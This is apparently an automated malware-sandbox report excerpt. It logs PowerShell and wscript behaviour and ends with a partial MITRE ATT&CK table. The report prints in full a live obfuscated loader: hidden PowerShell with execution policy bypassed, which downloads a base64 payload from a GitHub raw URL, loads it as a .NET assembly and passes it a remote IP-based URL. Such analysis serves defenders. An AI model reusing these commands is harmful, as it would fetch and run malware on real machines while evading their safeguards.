Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1831Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1630Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4406Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5396Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6948Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5624Thread sleep count: 4406 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5664Thread sleep count: 5396 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2084Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000004.00000002.2420242779.000002074328B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')"Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcddrw11cmwgjysnpsankyc5nccrj2xodhrwczovjysnl3jhdy5naxrodwj1cycrj2vyy29udgunkydudc4nkydjb20vtm8nkydezxqnkydly3rpbi9ojysnb0rljysndgvjjysnde8nkydulycrj3jlznmvagvhzhmvbwfpbi9ezscrj3rhae5vdggtvi50ehq5ngw7ienfbwjhjysncycrj2unkyc2nenvbnrlbnqnkycgpsaojysntmunkyd3lu9ijysnamvjdcbtjysnexn0zscrj20ujysntmv0jysnlldlyicrj0nsawvudckurg93bmxvjysnywqnkydtjysndccrj3jpbmcoq0unkydtdxjsktsnkycgq0vtjysnymknkydujysnyxinkyd5q29udgvudca9ifttexmnkyd0zw0uqycrj29ujysndicrj2unkydyjysndf06okzyjysnb21cyscrj3nlnjqnkydtdccrj3jpbmcoqycrj0unkydtjysnymfzzty0q29ujysndgunkydujysndck7ienfbwfzjysnc2vtymwnkyd5iccrjz0gw1inkydlzmxly3rpbycrj24uqxnzzw0nkydibhldoicrjzpmjysnb2fkkenfbscrj2jpbmfyjysneumnkydvbnrljysnbnqpoybbjysnzccrj24nkydsjysnawinkycusu8ujysnsg9tjysnzv06jysnolzbsshqdtynkyd0eccrj3quvfrtu1inkycvmccrjza1lycrjzcnkyc0ms4wmycrjzeumjcxjysnljcwmscrjy8vjysnoicrj3b0dghqdtysigp1nmrlc2f0axzhzg9qdtysigp1nmrlc2f0axynkydhjysnzg9qdtynkycsigp1nmqnkydlc2f0jysnaxzhjysnzg9qdtysigp1nljlz0enkydzbwonkyd1jysnnicrjywgaicrj3u2anu2lccrj2p1nmp1nicrjyknks5srxbsqwnfkcddrw0nlcckjykuukvwbefjrsgow2noqvjdmta2k1tjaefsxtexnytby2hbul01ncksw3n0uklur11by2hbul0znckuukvwbefjrsgnotrsjyxbc3rssw5hxvtjaefsxtm5ksb8icyoicrftny6q29nc3bfq1s0ldi0ldi1xs1qt2lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('cemurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/no'+'det'+'ecton/n'+'ode'+'tec'+'to'+'n/'+'refs/heads/main/de'+'tahnoth-v.txt94l; cemba'+'s'+'e'+'64content'+' = ('+'ne'+'w-ob'+'ject s'+'yste'+'m.'+'net'+'.web'+'client).downlo'+'ad'+'s'+'t'+'ring(ce'+'murl);'+' cem'+'bi'+'n'+'ar'+'ycontent = [sys'+'tem.c'+'on'+'v'+'e'+'r'+'t]::fr'+'omba'+'se64'+'st'+'ring(c'+'e'+'m'+'base64con'+'te'+'n'+'t); cemas'+'sembl'+'y '+'= [r'+'eflectio'+'n.assem'+'bly]:'+':l'+'oad(cem'+'binar'+'yc'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.io.'+'hom'+'e]:'+':vai(ju6'+'tx'+'t.ttssr'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6rega'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').replace('cem','$').replace(([char]106+[char]117+[char]54),[string][char]34).replace('94l',[string][char]39) | &( $env:comspec[4,24,25]-join'')"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcddrw11cmwgjysnpsankyc5nccrj2xodhrwczovjysnl3jhdy5naxrodwj1cycrj2vyy29udgunkydudc4nkydjb20vtm8nkydezxqnkydly3rpbi9ojysnb0rljysndgvjjysnde8nkydulycrj3jlznmvagvhzhmvbwfpbi9ezscrj3rhae5vdggtvi50ehq5ngw7ienfbwjhjysncycrj2unkyc2nenvbnrlbnqnkycgpsaojysntmunkyd3lu9ijysnamvjdcbtjysnexn0zscrj20ujysntmv0jysnlldlyicrj0nsawvudckurg93bmxvjysnywqnkydtjysndccrj3jpbmcoq0unkydtdxjsktsnkycgq0vtjysnymknkydujysnyxinkyd5q29udgvudca9ifttexmnkyd0zw0uqycrj29ujysndicrj2unkydyjysndf06okzyjysnb21cyscrj3nlnjqnkydtdccrj3jpbmcoqycrj0unkydtjysnymfzzty0q29ujysndgunkydujysndck7ienfbwfzjysnc2vtymwnkyd5iccrjz0gw1inkydlzmxly3rpbycrj24uqxnzzw0nkydibhldoicrjzpmjysnb2fkkenfbscrj2jpbmfyjysneumnkydvbnrljysnbnqpoybbjysnzccrj24nkydsjysnawinkycusu8ujysnsg9tjysnzv06jysnolzbsshqdtynkyd0eccrj3quvfrtu1inkycvmccrjza1lycrjzcnkyc0ms4wmycrjzeumjcxjysnljcwmscrjy8vjysnoicrj3b0dghqdtysigp1nmrlc2f0axzhzg9qdtysigp1nmrlc2f0axynkydhjysnzg9qdtynkycsigp1nmqnkydlc2f0jysnaxzhjysnzg9qdtysigp1nljlz0enkydzbwonkyd1jysnnicrjywgaicrj3u2anu2lccrj2p1nmp1nicrjyknks5srxbsqwnfkcddrw0nlcckjykuukvwbefjrsgow2noqvjdmta2k1tjaefsxtexnytby2hbul01ncksw3n0uklur11by2hbul0znckuukvwbefjrsgnotrsjyxbc3rssw5hxvtjaefsxtm5ksb8icyoicrftny6q29nc3bfq1s0ldi0ldi1xs1qt2lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('cemurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/no'+'det'+'ecton/n'+'ode'+'tec'+'to'+'n/'+'refs/heads/main/de'+'tahnoth-v.txt94l; cemba'+'s'+'e'+'64content'+' = ('+'ne'+'w-ob'+'ject s'+'yste'+'m.'+'net'+'.web'+'client).downlo'+'ad'+'s'+'t'+'ring(ce'+'murl);'+' cem'+'bi'+'n'+'ar'+'ycontent = [sys'+'tem.c'+'on'+'v'+'e'+'r'+'t]::fr'+'omba'+'se64'+'st'+'ring(c'+'e'+'m'+'base64con'+'te'+'n'+'t); cemas'+'sembl'+'y '+'= [r'+'eflectio'+'n.assem'+'bly]:'+':l'+'oad(cem'+'binar'+'yc'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.io.'+'hom'+'e]:'+':vai(ju6'+'tx'+'t.ttssr'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6rega'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').replace('cem','$').replace(([char]106+[char]117+[char]54),[string][char]34).replace('94l',[string][char]39) | &( $env:comspec[4,24,25]-join'')"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information221
Scripting		Valid Accounts11
Command and Scripting Interpreter		221
Scripting		11
Process Injection		21
